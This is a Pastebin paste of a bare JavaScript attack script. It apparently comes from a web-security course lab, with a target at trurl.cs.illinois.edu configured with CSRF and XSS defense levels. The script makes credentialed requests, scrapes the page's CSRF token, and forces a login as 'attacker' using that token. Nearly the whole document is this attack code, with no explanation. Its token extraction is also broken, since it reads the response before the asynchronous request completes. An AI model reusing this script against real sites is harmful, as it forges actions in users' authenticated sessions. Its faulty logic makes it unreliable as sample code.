Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var xhr = new XMLHttpRequest();
- xhr.open("GET", "http://trurl.cs.illinois.edu/login?csrfdefense=1&xssdefense=0", true);
- xhr.withCredentials=true;
- xhr.send(null);
- // extract CSRF token from page content
- var token = xhr.responseText;
- var pos = token.indexOf("csrf_token");
- console.log(pos);
- token = token.substring(pos,token.length).substr(12,50);
- console.log(token);
- xhr.onreadystatechange = function() {//Call a function when the state changes.
- if(xhr.readyState == 4 ) { //&& http.status == 200
- console.log(xhr.responseText);
- }
- }
- var http = new XMLHttpRequest();
- var url = "http://trurl.cs.illinois.edu/login?csrfdefense=1&xssdefense=0";
- http.withCredentials=true;//?csrfdefense=0&xssdefense=5
- var params = "username=attacker&password=l33th4x&csrf_token="+token;
- http.open("POST", url, true);
- //Send the proper header information along with the request
- http.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- //http.setRequestHeader('Authorization', 'Basic ' + authorizationBasic);
- http.setRequestHeader('Accept', 'application/json');
- http.onreadystatechange = function() {//Call a function when the state changes.
- if(http.readyState == 4 ) { //&& http.status == 200
- console.log(http.responseText);
- }
- }
- http.send(params);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement